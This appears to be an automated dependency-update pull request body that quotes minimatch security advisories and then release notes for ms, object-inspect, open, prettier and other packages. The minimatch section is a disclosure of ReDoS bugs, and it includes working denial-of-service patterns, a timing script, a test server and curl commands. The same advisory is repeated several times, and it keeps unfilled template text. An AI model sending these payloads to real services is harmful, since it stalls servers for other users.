Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

๐Ÿšจ minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.

Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.

Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

๐Ÿšจ minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) โ€” exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

๐Ÿšจ minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) โ€” exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

๐Ÿšจ minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) โ€” exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

๐Ÿšจ minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) โ€” exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

๐Ÿšจ minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) โ€” exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

๐Ÿšจ minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) โ€” exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

๐Ÿšจ minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) โ€” exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

๐Ÿšจ minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) โ€” exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

๐Ÿšจ minimatch ReDoS vulnerability

A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.

Commits

See the full diff on Github. The new version differs by 3 commits:

โ†—๏ธ ms (indirect, 2.1.2 โ†’ 2.1.3) ยท Repo

Release Notes

2.1.3

Patches

  • Rename zeit to vercel: #151
  • Bump eslint from 4.12.1 to 4.18.2: #122
  • Add prettier as a dev dependency: #135 #153
  • Use GitHub Actions CI: #154

Credits

Huge thanks to @getsnoopy for helping!

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 6 commits:

โ†—๏ธ node-releases (indirect, 1.1.73 โ†’ 2.0.36) ยท Repo

Sorry, we couldnโ€™t find anything useful about this release.

โ†—๏ธ npm-run-path (indirect, 4.0.1 โ†’ 6.0.0) ยท Repo

Release Notes

6.0.0

Breaking

Improvements

v5.3.0...v6.0.0

5.3.0

  • Add preferLocal and addExecaPath options (#18) 09419af

v5.2.0...v5.3.0

5.2.0

v5.1.0...v5.2.0

5.1.0

v5.0.1...v5.1.0

5.0.1

v5.0.0...v5.0.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 19 commits:

โ†—๏ธ object-inspect (indirect, 1.11.0 โ†’ 1.13.4) ยท Repo ยท Changelog

Release Notes

1.13.4 (from changelog)

Commits

  • [Fix] avoid being fooled by a Symbol.toStringTag fa5870d
  • [Tests] fix tests in node v6.0 - v6.4 2abfe1b
  • [Dev Deps] update es-value-fixtures, for-each, has-symbols 3edfb01

1.13.3 (from changelog)

Commits

  • [actions] split out node 10-20, and 20+ 44395a8
  • [Fix] quoteStyle: properly escape only the containing quotes 5137f8f
  • [Refactor] clean up quoteStyle code 450680c
  • [Tests] add quoteStyle escaping tests e997c59
  • [Dev Deps] update auto-changelog, es-value-fixtures, tape d5a469c
  • [Tests] replace aud with npm audit fb7815f
  • [Dev Deps] update mock-property 11c817b

1.13.2 (from changelog)

Commits

  • [readme] update badges 8a51e6b
  • [Dev Deps] update @ljharb/eslint-config, tape ef05f58
  • [Dev Deps] update error-cause, has-tostringtag, tape c0c6c26
  • [Fix] Don't throw when global is not defined d4d0965
  • [meta] add missing engines.node 17a352a
  • [Dev Deps] update globalthis 9c08884
  • [Dev Deps] update error-cause 6af352d
  • [Dev Deps] update npmignore 94e617d
  • [Dev Deps] update mock-property 2ac24d7
  • [Dev Deps] update tape 46125e5

1.13.1 (from changelog)

Commits

  • [Fix] in IE 8, global can !== window despite them being prototypes of each other 30d0859

1.13.0 (from changelog)

Commits

  • [New] add special handling for the global object 431bab2
  • [Dev Deps] update @ljharb/eslint-config, aud, tape fd4f619
  • [Dev Deps] update mock-property, tape b453f6c
  • [Dev Deps] update error-cause e8ffc57
  • [Dev Deps] update tape 054b8b9
  • [Dev Deps] temporarily remove aud due to breaking change in transitive deps 2476845
  • [Dev Deps] pin glob, since v10.3.8+ requires a broken jackspeak 383fa5e
  • [Dev Deps] pin jackspeak since 2.1.2+ depends on npm aliases, which kill the install process in npm < 6 68c244c

1.12.3 (from changelog)

Commits

  • [Fix] in eg FF 24, collections lack forEach 75fc226
  • [actions] update rebase action to use reusable workflow 250a277
  • [Dev Deps] update aud, es-value-fixtures, tape 66a19b3
  • [Dev Deps] update @ljharb/eslint-config, aud, error-cause c43d332
  • [Tests] add @pkgjs/support to postlint e2618d2

1.12.2 (from changelog)

Commits

  • [Fix] use util.inspect for a custom inspection symbol method e243bf2
  • [meta] add support info ca20ba3
  • [Fix] ignore cause in node v16.9 and v16.10 where it has a bug 86aa553

1.12.1 (from changelog)

Commits

  • [Tests] use mock-property 4ec8893
  • [meta] use npmignore to autogenerate an npmignore file 07f868c
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, tape b05244b
  • [Dev Deps] update @ljharb/eslint-config, error-cause, es-value-fixtures, functions-have-names, tape d037398
  • [Fix] properly handle callable regexes in older engines 848fe48

1.12.0 (from changelog)

Commits

  • [New] add numericSeparator boolean option 2d2d537
  • [Robustness] cache more prototype methods 191533d
  • [New] ensure an Errorโ€™s cause is displayed 53bc2ce
  • [Dev Deps] update eslint, @ljharb/eslint-config bc164b6
  • [Robustness] cache RegExp.prototype.test a314ab8
  • [meta] fix auto-changelog settings 5ed0983

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 65 commits:

โ†—๏ธ object.assign (indirect, 4.1.2 โ†’ 4.1.7) ยท Repo ยท Changelog

Release Notes

4.1.7 (from changelog)

  • [Deps] add missing es-object-atoms (#86)

4.1.6 (from changelog)

  • [Refactor] use call-bound directly; use es-object-atoms
  • [Deps] update call-bind, has-symbols
  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, hasown, mock-property, ses, tape
  • [actions] split out node 10-20, and 20+
  • [actions] remove redundant finisher
  • [Tests] replace aud with npm audit

4.1.5 (from changelog)

  • [meta] republish without testing HTML file (#85)
  • [Deps] update call-bind, define-properties
  • [Dev Deps] use hasown instead of has
  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, aud, npmignore, mock-property, tape
  • [actions] update rebase action

4.1.4 (from changelog)

  • [meta] fix npmignore integration (#83)

4.1.3 (from changelog)

  • [Refactor] make steps closer to actual spec
  • [Refactor] simplify object coercible check
  • [readme] remove defunct badges, add coverage and actions badges
  • [eslint] ignore coverage output
  • [meta] use npmignore to autogenerate an npmignore file
  • [meta] remove audit-level
  • [Deps] update call-bind, define-properties, has-symbols
  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, aud, functions-have-names, safe-publish-latest, ses, tape
  • [actions] use node/install instead of node/run; use codecov action
  • [actions] reuse common workflows
  • [actions] update codecov uploader
  • [Tests] add implementation tests
  • [Tests] use mock-property
  • [Tests] disable posttest pending aud handling file: deps
  • [Tests] migrate remaining tests to Github Actions (#81)
  • [Tests] gitignore coverage output
  • [Tests] test node v1-v9 on Github Actions instead of travis; resume testing all minors (#80)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 63 commits:

โ†—๏ธ object.values (indirect, 1.1.4 โ†’ 1.2.1) ยท Repo ยท Changelog

Release Notes

1.1.7 (from changelog)

Commits

  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, aud, tape 7a52cb5
  • [Deps] update define-properties, es-abstract 4adc158

1.1.6 (from changelog)

Commits

  • [actions] reuse common workflows 4072b71
  • [meta] use npmignore to autogenerate an npmignore file 6881278
  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, array.prototype.map, safe-publish-latest, tape 28c21e6
  • [Dev Deps] update eslint, @ljharb/eslint-config, array.prototype.map, aud, auto-changelog, functions-have-names, tape 0e78caa
  • [actions] update rebase action to use reusable workflow 6f37c60
  • [actions] update codecov uploader d7c5f30
  • [Deps] update define-properties, es-abstract 911ca0e

1.1.5 (from changelog)

Commits

  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, tape c397925
  • [Deps] update es-abstract f98d0da
  • [Robustness] use a call-bound Array.prototype.push 72a3213
  • [meta] npmignore coverage output 3b0433f

Does any of this look wrong? Please let us know.

โ†—๏ธ open (indirect, 7.4.2 โ†’ 11.0.0) ยท Repo

Release Notes

11.0.0

Breaking

Improvements

  • Automatically detect whether PowerShell is accessible in WSL 67109f8
  • Add chromium-browser fallback for Linux b40f4b8
  • Throw AggregateError instead of only latest error (#364) 2778ac6

Fixes

  • Fix app launch failure detection for fallback support ce31b94
  • Fix WSL access via remote SSH 8821bf7
  • Fix handling of import.meta.url not being available 8ce0f7d
  • Fix: Suppress PowerShell progress messages on Windows 2283000
  • Fix: Ignore stdio on Windows when not waiting for process e1af0ee
  • Fix WSL2 local file opening 269b5fd
  • Fix spawn handling 966239c
  • Fix PowerShell argument escaping 274d704

v10.2.0...v11.0.0

10.2.0

v10.1.2...v10.2.0

10.1.2

  • Fix detection of Windows default browser from WSL (#358) 6187a82

v10.1.1...v10.1.2

10.1.1

  • Fix: Use correct bundle ID for Microsoft Edge (#356) 55537f1

v10.1.0...v10.1.1

10.1.0

v10.0.4...v10.1.0

10.0.4

  • Fix support for passing predefined app to openApp() (#335) d9e7422

v10.0.3...v10.0.4

10.0.3

v10.0.2...v10.0.3

10.0.2

v10.0.1...v10.0.2

10.0.1

  • Add Windows environment variable fallback for some broken systems (#328) 8e69be4

v10.0.0...v10.0.1

10.0.0

Breaking

v9.1.0...v10.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ open-editor (indirect, 3.0.0 โ†’ 6.0.0) ยท Repo

Release Notes

6.0.0

Breaking

Improvements

v5.1.0...v6.0.0

5.1.0

v5.0.0...v5.1.0

5.0.0

Breaking

Improvements

v4.1.1...v5.0.0

4.1.1

v4.1.0...v4.1.1

4.1.0

v4.0.0...v4.1.0

4.0.0

Breaking

  • Require Node.js 12.20 053506d
  • This package is now pure ESM. Please read this.
  • openEditor.make moved to a named export called getEditorInfo.
  • The EditorRunConfig TypeScript type was renamed to EditorInfo.

v3.0.0...v4.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 17 commits:

โ†—๏ธ optionator (indirect, 0.9.1 โ†’ 0.9.4) ยท Repo ยท Changelog

โ†—๏ธ path-exists (indirect, 4.0.0 โ†’ 5.0.0) ยท Repo

Release Notes

5.0.0

Breaking

v4.0.0...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 9 commits:

โ†—๏ธ picomatch (indirect, 2.3.0 โ†’ 2.3.1) ยท Repo ยท Changelog

Release Notes

2.3.1

Fixed

  • Fixes bug when a pattern containing an expression after the closing parenthesis (/!(*.d).{ts,tsx}) was incorrectly converted to regexp (9f241ef).

Changed

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 13 commits:

โ†—๏ธ pkg-dir (indirect, 4.2.0 โ†’ 8.0.0) ยท Repo

Release Notes

8.0.0

Breaking

v7.0.0...v8.0.0

7.0.0

Breaking

v6.0.1...v7.0.0

6.0.1

v6.0.0...v6.0.1

6.0.0

Breaking

-const pkgDir = require('pkg-dir');
+import {packageDirectory} from 'pkg-dir';

-await pkgDir('/Users/unicorn/foo');
+await packageDirectory({cwd: '/Users/unicorn/foo'});

v5.0.0...v6.0.0

5.0.0

Breaking

v4.2.0...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 16 commits:

โ†—๏ธ plur (indirect, 4.0.0 โ†’ 5.1.0) ยท Repo

Release Notes

5.1.0

v5.0.0...v5.1.0

5.0.0

Breaking

v4.0.0...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 7 commits:

โ†—๏ธ prettier (indirect, 1.19.1 โ†’ 3.8.1) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

